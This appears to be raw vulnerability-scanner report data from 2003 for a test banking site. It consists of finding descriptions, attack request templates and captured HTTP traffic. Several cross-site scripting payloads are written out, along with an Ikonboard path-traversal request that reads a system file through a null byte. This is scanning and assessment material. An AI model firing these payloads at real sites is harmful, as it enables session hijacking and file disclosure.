To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>--><script>alert('XSS')</script></attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /plink.asp?a=b&c=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = </textarea><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack></textarea><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 115
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"'><img src="javascript:alert('XSS')"><br>Please try again.
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>javascript:alert\('XSS'\)">GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../boot.ini%00 HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:19 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:Ikonboard Arbitrary File Source Disclosure (help.cgi)~FileName~ was found vulnerable.<BR>Clicking on the
Browser tab or link below will show the password file retrieved from the
system.<BR>"~FullGetURL~"<BR><A
HREF="http://www.ikondiscussion.com/ikonboard/"></A><A
HREF="http://www.ikondiscussion.com/ikonboard/"></A><BR><A
HREF="http://www.ikondiscussion.com/ikonboard/">Ikonboard</A> is a free
bulletin board system . A vulnerability in the product allows remote attackers
to read local files with the privileges of the web server.
<BR><BR><B>Vulnerable systems:</B> Ikonboard v2.1.6b and v2.1.7b.An official patch is not available yet. You can
fix the script temporarily by inserting the following line under line 45 in
'help.cgi':<BR> <BR><TT> if($inhelpon =~ /\.\./) { &hackdetected; }<BR>
<BR> then at the bottome append:<BR> <BR> sub hackdetected {<BR> print
"Content-type: text/plain\n\n";<BR> print "sorry, this hole was patched
:)\n";<BR> print "you have been logged.\n";<BR> exit;<BR> }</TT>GET /cgi-bin/ikonboard/<attack>help.cgi?helpon=../../../../../boot.ini%00</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |401GET /_private/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:41 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_private)FrontPage Directory: /_private/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_private/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:41 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /cgi-bin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:47 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (cgi-bin)<B>Found Directory:</B> /cgi-bin/ <p>
This folder normally contains server-side scripts.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /forgot2.asp?msg2=no&msg=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1853
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"'><img src="javascript:alert('XSS')"></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>>"'><img%20src="javascript:alert('XSS')"></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"><script>alert("XSS")</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
